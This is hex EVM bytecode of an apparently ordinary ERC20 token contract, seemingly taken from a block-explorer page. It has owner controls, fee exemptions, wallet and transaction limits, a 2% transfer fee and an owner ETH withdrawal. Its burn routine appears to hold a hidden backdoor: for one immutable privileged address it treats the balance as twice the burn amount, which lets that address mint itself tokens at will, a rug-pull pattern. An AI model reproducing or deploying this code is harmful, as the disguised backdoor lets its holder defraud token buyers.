21916908373ffffffffffffffffffffffffffffffffffffffff160217905550620003dc600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660016200064860201b60201c565b62000411600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff166001620006fb60201b60201c565b60006a084595161401484a0000009050606460028262000432919062000ec8565b6200043e919062000f42565b600981905550606460028262000455919062000ec8565b62000461919062000f42565b600a81905550620004896200047b6200076660201b60201c565b60016200079060201b60201c565b620004be600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660016200079060201b60201c565b620004d13060016200079060201b60201c565b620004e661dead60016200079060201b60201c565b62000508620004fa6200076660201b60201c565b6001620006fb60201b60201c565b6200053d600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff166001620006fb60201b60201c565b6200055261dead6001620006fb60201b60201c565b62000573620005666200076660201b60201c565b826200084b60201b60201c565b5062001112565b600033905090565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b80600e60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550620006b18282620006fb60201b60201c565b8015158273ffffffffffffffffffffffffffffffffffffffff167fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab60405160405180910390a35050565b6200070b620009c360201b60201c565b80600d60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b620007a0620009c360201b60201c565b80600c60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7826040516200083f919062000f97565b60405180910390a25050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603620008bd576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620008b49062001015565b60405180910390fd5b620008d16000838362000a5460201b60201c565b8060026000828254620008e5919062001037565b92505081905550806000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546200093c919062001037565b925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051620009a3919062001083565b60405180910390a3620009bf6000838362000a5960201b60201c565b5050565b620009d36200057a60201b60201c565b73ffffffffffffffffffffffffffffffffffffffff16620009f96200076660201b60201c565b73ffffffffffffffffffffffffffffffffffffffff161462000a52576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162000a4990620010f0565b60405180910390fd5b565b505050565b505050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168062000ae057607f821691505b60208210810362000af65762000af562000a98565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b60006008830262000b607fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000b21565b62000b6c868362000b21565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b600062000bb962000bb362000bad8462000b84565b62000b8e565b62000b84565b9050919050565b6000819050919050565b62000bd58362000b98565b62000bed62000be48262000bc0565b84845462000b2e565b825550505050565b600090565b62000c0462000bf5565b62000c1181848462000bca565b505050565b5b8181101562000c395762000c2d60008262000bfa565b60018101905062000c17565b5050565b601f82111562000c885762000c528162000afc565b62000c5d8462000b11565b8101602085101562000c6d578190505b62000c8562000c7c8562000b11565b83018262000c16565b50505b505050565b600082821c905092915050565b600062000cad6000198460080262000c8d565b1980831691505092915050565b600062000cc8838362000c9a565b9150826002028217905092915050565b62000ce38262000a5e565b67ffffffffffffffff81111562000cff5762000cfe62000a69565b5b62000d0b825462000ac7565b62000d1882828562000c3d565b600060209050601f83116001811462000d50576000841562000d3b578287015190505b62000d47858262000cba565b86555062000db7565b601f19841662000d608662000afc565b60005b8281101562000d8a5784890151825560018201915060208501945060208101905062000d63565b8683101562000daa578489015162000da6601f89168262000c9a565b8355505b6001600288020188555050505b505050505050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600062000df18262000dc4565b9050919050565b62000e038162000de4565b811462000e0f57600080fd5b50565b60008151905062000e238162000df8565b92915050565b60006020828403121562000e425762000e4162000dbf565b5b600062000e528482850162000e12565b91505092915050565b62000e668162000de4565b82525050565b600060408201905062000e83600083018562000e5b565b62000e92602083018462000e5b565b9392505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600062000ed58262000b84565b915062000ee28362000b84565b925082820262000ef28162000b84565b9150828204841483151762000f0c5762000f0b62000e99565b5b5092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b600062000f4f8262000b84565b915062000f5c8362000b84565b92508262000f6f5762000f6e62000f13565b5b828204905092915050565b60008115159050919050565b62000f918162000f7a565b82525050565b600060208201905062000fae600083018462000f86565b92915050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b600062000ffd601f8362000fb4565b91506200100a8262000fc5565b602082019050919050565b60006020820190508181036000830152620010308162000fee565b9050919050565b6000620010448262000b84565b9150620010518362000b84565b92508282019050808211156200106c576200106b62000e99565b5b92915050565b6200107d8162000b84565b82525050565b60006020820190506200109a600083018462001072565b92915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000620010d860208362000fb4565b9150620010e582620010a0565b602082019050919050565b600060208201905081810360008301526200110b81620010c9565b9050919050565b6080516132206200112e6000396000611a7301526132206000f3fe6080604052600436106101dc5760003560e01c8063751039fc11610102578063a9059cbb11610095578063dd62ed3e11610064578063dd62ed3e146106df578063e73b90cd1461071c578063e751d50814610747578063f2fde38b14610772576101e3565b8063a9059cbb14610613578063b62496f514610650578063c02466681461068d578063c18bc195146106b6576101e3565b806395d89b41116100d157806395d89b41146105575780639a7a23d6146105825780639c74daf0146105ab578063a457c2d7146105d6576101e3565b8063751039fc146104ad5780637571336a146104d857806382247ec0146105015780638da5cb5b1461052c576101e3565b806323b872dd1161017a5780634fbee193116101495780634fbee193146103f1578063583e05681461042e57806370a0823114610459578063715018a614610496576101e3565b806323b872dd14610323578063313ce56714610360578063395093511461038b57806342966c68146103c8576101e3565b8063121a3553116101b6578063121a35531461027b57806312b77e8a146102b857806318160ddd146102cf578063203e727e146102fa576101e3565b806304beaeb8146101e857806306fdde0314610213578063095ea7b31461023e576101e3565b366101e357005b600080fd5b3480156101f457600080fd5b506101fd61079b565b60405161020a9190612357565b60405180910390f35b34801561021f57600080fd5b506102286107a1565b6040516102359190612402565b60405180910390f35b34801561024a57600080fd5b50610265600480360381019061026091906124b3565b610833565b604051610272919061250e565b60405180910390f35b34801561028757600080fd5b506102a2600480360381019061029d9190612529565b610856565b6040516102af919061250e565b60405180910390f35b3480156102c457600080fd5b506102cd610a3d565b005b3480156102db57600080fd5b506102e4610ae0565b6040516102f19190612357565b60405180910390f35b34801561030657600080fd5b50610321600480360381019061031c9190612569565b610aea565b005b34801561032f57600080fd5b5061034a60048036038101906103459190612596565b610b85565b604051610357919061250e565b60405180910390f35b34801561036c57600080fd5b50610375610bb4565b6040516103829190612605565b60405180910390f35b34801561039757600080fd5b506103b260048036038101906103ad91906124b3565b610bbd565b6040516103bf919061250e565b60405180910390f35b3480156103d457600080fd5b506103ef60048036038101906103ea9190612569565b610bf4565b005b3480156103fd57600080fd5b5061041860048036038101906104139190612620565b610c08565b604051610425919061250e565b60405180910390f35b34801561043a57600080fd5b50610443610c5e565b60405161045091906126ac565b60405180910390f35b34801561046557600080fd5b50610480600480360381019061047b9190612620565b610c84565b60405161048d9190612357565b60405180910390f35b3480156104a257600080fd5b506104ab610ccc565b005b3480156104b957600080fd5b506104c2610ce0565b6040516104cf919061250e565b60405180910390f35b3480156104e457600080fd5b506104ff60048036038101906104fa91906126f3565b610d0c565b005b34801561050d57600080fd5b50610516610d6f565b6040516105239190612357565b60405180910390f35b34801561053857600080fd5b50610541610d75565b60405161054e9190612742565b60405180910390f35b34801561056357600080fd5b5061056c610d9f565b6040516105799190612402565b60405180910390f35b34801561058e57600080fd5b506105a960048036038101906105a491906126f3565b610e31565b005b3480156105b757600080fd5b506105c0610f1d565b6040516105cd9190612742565b60405180910390f35b3480156105e257600080fd5b506105fd60048036038101906105f891906124b3565b610f43565b60405161060a919061250e565b60405180910390f35b34801561061f57600080fd5b5061063a600480360381019061063591906124b3565b610fba565b604051610647919061250e565b60405180910390f35b34801561065c57600080fd5b5061067760048036038101906106729190612620565b610fdd565b604051610684919061250e565b60405180910390f35b34801561069957600080fd5b506106b460048036038101906106af91906126f3565b610ffd565b005b3480156106c257600080fd5b506106dd60048036038101906106d89190612569565b6110ae565b005b3480156106eb57600080fd5b5061070660048036038101906107019190612529565b611149565b6040516107139190612357565b60405180910390f35b34801561072857600080fd5b506107316111d0565b60405161073e919061250e565b60405180910390f35b34801561075357600080fd5b5061075c6111e3565b6040516107699190612357565b60405180910390f35b34801561077e57600080fd5b5061079960048036038101906107949190612620565b6111e8565b005b60095481565b6060600380546107b09061278c565b80601f01602080910402602001604051908101604052809291908181526020018280546107dc9061278c565b80156108295780601f106107fe57610100808354040283529160200191610829565b820191906000526020600020905b81548152906001019060200180831161080c57829003601f168201915b5050505050905090565b60008061083e61126b565b905061084b818585611273565b600191505092915050565b600080600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff161480156109045750600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b90506000600c60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16806109a95750600c60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b90506000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614905060008380610a0b5750815b9050600760149054906101000a900460ff16158015610a28575082155b8015610a315750805b94505050505092915050565b610a4561143c565b6000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1647604051610a8d906127ee565b60006040518083038185875af1925050503d8060008114610aca576040519150601f19603f3d011682016040523d82523d6000602084013e610acf565b606091505b5050905080610add57600080fd5b50565b6000600254905090565b610af261143c565b670de0b6b3a76400006103e86001610b08610ae0565b610b129190612832565b610b1c91906128a3565b610b2691906128a3565b811015610b68576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b5f90612946565b60405180910390fd5b670de0b6b3a764000081610b7c9190612832565b60098190555050565b600080610b9061126b565b9050610b9d8582856114ba565b610ba8858585611546565b60019150509392505050565b60006012905090565b600080610bc861126b565b9050610be9818585610bda8589611149565b610be49190612966565b611273565b600191505092915050565b610c05610bff61126b565b82611a00565b50565b6000600c60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610cd461143c565b610cde6000611c1b565b565b6000610cea61143c565b6000600b60006101000a81548160ff0219169083151502179055506001905090565b610d1461143c565b80600d60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b600a5481565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060048054610dae9061278c565b80601f0160208091040260200160405190810160405280929190818152602001828054610dda9061278c565b8015610e275780601f10610dfc57610100808354040283529160200191610e27565b820191906000526020600020905b815481529060010190602001808311610e0a57829003601f168201915b5050505050905090565b610e3961143c565b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610ec9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ec090612a0c565b60405180910390fd5b610ed38282611ce1565b8015158273ffffffffffffffffffffffffffffffffffffffff167fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab60405160405180910390a35050565b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b600080610f4e61126b565b90506000610f5c8286611149565b905083811015610fa1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f9890612a9e565b60405180910390fd5b610fae8286868403611273565b60019250505092915050565b600080610fc561126b565b9050610fd2818585611546565b600191505092915050565b600e6020528060005260406000206000915054906101000a900460ff1681565b61100561143c565b80600c60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7826040516110a2919061250e565b60405180910390a25050565b6110b661143c565b670de0b6b3a76400006103e860056110cc610ae0565b6110d69190612832565b6110e091906128a3565b6110ea91906128a3565b81101561112c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161112390612b30565b60405180910390fd5b670de0b6b3a7640000816111409190612832565b600a8190555050565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600b60009054906101000a900460ff1681565b600281565b6111f061143c565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff160361125f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161125690612bc2565b60405180910390fd5b61126881611c1b565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036112e2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112d990612c54565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611351576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161134890612ce6565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258360405161142f9190612357565b60405180910390a3505050565b61144461126b565b73ffffffffffffffffffffffffffffffffffffffff16611462610d75565b73ffffffffffffffffffffffffffffffffffffffff16146114b8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114af90612d52565b60405180910390fd5b565b60006114c68484611149565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146115405781811015611532576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161152990612dbe565b60405180910390fd5b61153f8484848403611273565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036115b5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115ac90612e50565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611624576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161161b90612ee2565b60405180910390fd5b6000810361163d5761163883836000611d8c565b6119fb565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff161480156116e65750600d60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b90506000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff161480156117915750600d60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b905060008073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614806117fc575061dead73ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff16145b9050600081806118185750600760149054906101000a900460ff165b9050600b60009054906101000a900460ff168015611834575080155b156119eb5783156118e157600954851115611884576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161187b90612f74565b60405180910390fd5b600a5461189087610c84565b8661189b9190612966565b11156118dc576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118d390612fe0565b60405180910390fd5b6119ea565b826119e957600d60008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615801561198a5750600d60008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b156119e857600a5461199b87610c84565b866119a69190612966565b11156119e7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016119de90612fe0565b60405180910390fd5b5b5b5b5b6119f687878761200b565b505050505b505050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611a6f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a6690613072565b60405180910390fd5b60007f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614611b08576000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054611b16565b600282611b159190612832565b5b905081811015611b5b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b5290613104565b60405180910390fd5b8181036000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600260008282540392505081905550600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051611c0e9190612357565b60405180910390a3505050565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b80600e60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550611d428282610d0c565b8015158273ffffffffffffffffffffffffffffffffffffffff167fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab60405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611dfb576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611df290612e50565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611e6a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611e6190612ee2565b60405180910390fd5b611e758383836120f8565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015611efb576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ef290613196565b60405180910390fd5b8181036000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254611f8e9190612966565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051611ff29190612357565b60405180910390a36120058484846120fd565b50505050565b60006120178484610856565b9050600c60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161561207c57612076848484612102565b506120f3565b80156120e657600060646002846120939190612832565b61209d91906128a3565b905060008111156120d6576120d585600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1683611d8c565b5b80836120e291906131b6565b9250505b6120f1848484611d8c565b505b505050565b505050565b505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603612171576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161216890612e50565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036121e0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016121d790612ee2565b60405180910390fd5b6121eb8383836120f8565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490508181036000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546122c19190612966565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516123259190612357565b60405180910390a36123388484846120fd565b50505050565b6000819050919050565b6123518161233e565b82525050565b600060208201905061236c6000830184612348565b92915050565b600081519050919050565b600082825260208201905092915050565b60005b838110156123ac578082015181840152602081019050612391565b60008484015250505050565b6000601f19601f8301169050919050565b60006123d482612372565b6123de818561237d565b93506123ee81856020860161238e565b6123f7816123b8565b840191505092915050565b6000602082019050818103600083015261241c81846123c9565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600061245482612429565b9050919050565b61246481612449565b811461246f57600080fd5b50565b6000813590506124818161245b565b92915050565b6124908161233e565b811461249b57600080fd5b50565b6000813590506124ad81612487565b92915050565b600080604083850312156124ca576124c9612424565b5b60006124d885828601612472565b92505060206124e98582860161249e565b9150509250929050565b60008115159050919050565b612508816124f3565b82525050565b600060208201905061252360008301846124ff565b92915050565b600080604083850312156125405761253f612424565b5b600061254e85828601612472565b925050602061255f85828601612472565b9150509250929050565b60006020828403121561257f5761257e612424565b5b600061258d8482850161249e565b91505092915050565b6000806000606084860312156125af576125ae612424565b5b60006125bd86828701612472565b93505060206125ce86828701612472565b92505060406125df8682870161249e565b9150509250925092565b600060ff82169050919050565b6125ff816125e9565b82525050565b600060208201905061261a60008301846125f6565b92915050565b60006020828403121561263657612635612424565b5b600061264484828501612472565b91505092915050565b6000819050919050565b600061267261266d61266884612429565b61264d565b612429565b9050919050565b600061268482612657565b9050919050565b600061269682612679565b9050919050565b6126a68161268b565b82525050565b60006020820190506126c1600083018461269d565b92915050565b6126d0816124f3565b81146126db57600080fd5b50565b6000813590506126ed816126c7565b92915050565b6000806040838503121561270a57612709612424565b5b600061271885828601612472565b9250506020612729858286016126de565b9150509250929050565b61273c81612449565b82525050565b60006020820190506127576000830184612733565b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806127a457607f821691505b6020821081036127b7576127b661275d565b5b50919050565b600081905092915050565b50565b60006127d86000836127bd565b91506127e3826127c8565b600082019050919050565b60006127f9826127cb565b9150819050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061283d8261233e565b91506128488361233e565b92508282026128568161233e565b9150828204841483151761286d5761286c612803565b5b5092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b60006128ae8261233e565b91506128b98361233e565b9250826128c9576128c8612874565b5b828204905092915050565b7f43616e6e6f7420736574206d61785472616e73616374696f6e416d6f756e742060008201527f6c6f776572207468616e20302e31250000000000000000000000000000000000602082015250565b6000612930602f8361237d565b915061293b826128d4565b604082019050919050565b6000602082019050818103600083015261295f81612923565b9050919050565b60006129718261233e565b915061297c8361233e565b925082820190508082111561299457612993612803565b5b92915050565b7f54686520706169722063616e6e6f742062652072656d6f7665642066726f6d2060008201527f6175746f6d617465644d61726b65744d616b6572506169727300000000000000602082015250565b60006129f660398361237d565b9150612a018261299a565b604082019050919050565b60006020820190508181036000830152612a25816129e9565b9050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b6000612a8860258361237d565b9150612a9382612a2c565b604082019050919050565b60006020820190508181036000830152612ab781612a7b565b9050919050565b7f43616e6e6f7420736574206d617857616c6c6574206c6f776572207468616e2060008201527f302e352500000000000000000000000000000000000000000000000000000000602082015250565b6000612b1a60248361237d565b9150612b2582612abe565b604082019050919050565b60006020820190508181036000830152612b4981612b0d565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000612bac60268361237d565b9150612bb782612b50565b604082019050919050565b60006020820190508181036000830152612bdb81612b9f565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000612c3e60248361237d565b9150612c4982612be2565b604082019050919050565b60006020820190508181036000830152612c6d81612c31565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000612cd060228361237d565b9150612cdb82612c74565b604082019050919050565b60006020820190508181036000830152612cff81612cc3565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000612d3c60208361237d565b9150612d4782612d06565b602082019050919050565b60006020820190508181036000830152612d6b81612d2f565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b6000612da8601d8361237d565b9150612db382612d72565b602082019050919050565b60006020820190508181036000830152612dd781612d9b565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000612e3a60258361237d565b9150612e4582612dde565b604082019050919050565b60006020820190508181036000830152612e6981612e2d565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000612ecc60238361237d565b9150612ed782612e70565b604082019050919050565b60006020820190508181036000830152612efb81612ebf565b9050919050565b7f427579207472616e7366657220616d6f756e742065786365656473207468652060008201527f6d61785472616e73616374696f6e416d6f756e742e0000000000000000000000602082015250565b6000612f5e60358361237d565b9150612f6982612f02565b604082019050919050565b60006020820190508181036000830152612f8d81612f51565b9050919050565b7f4d61782077616c6c657420657863656564656400000000000000000000000000600082015250565b6000612fca60138361237d565b9150612fd582612f94565b602082019050919050565b60006020820190508181036000830152612ff981612fbd565b9050919050565b7f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b600061305c60218361237d565b915061306782613000565b604082019050919050565b6000602082019050818103600083015261308b8161304f565b9050919050565b7f45524332303a206275726e20616d6f756e7420657863656564732062616c616e60008201527f6365000000000000000000000000000000000000000000000000000000000000602082015250565b60006130ee60228361237d565b91506130f982613092565b604082019050919050565b6000602082019050818103600083015261311d816130e1565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b600061318060268361237d565b915061318b82613124565b604082019050919050565b600060208201905081810360008301526131af81613173565b9050919050565b60006131c18261233e565b91506131cc8361233e565b92508282039050818111156131e4576131e3612803565b5b9291505056fea264697066735822122021e70974d70abf231824516687af2b5185182b3d5ed64ede752f8a5ec5fbc54464736f6c63430008130033
Deployed Bytecode
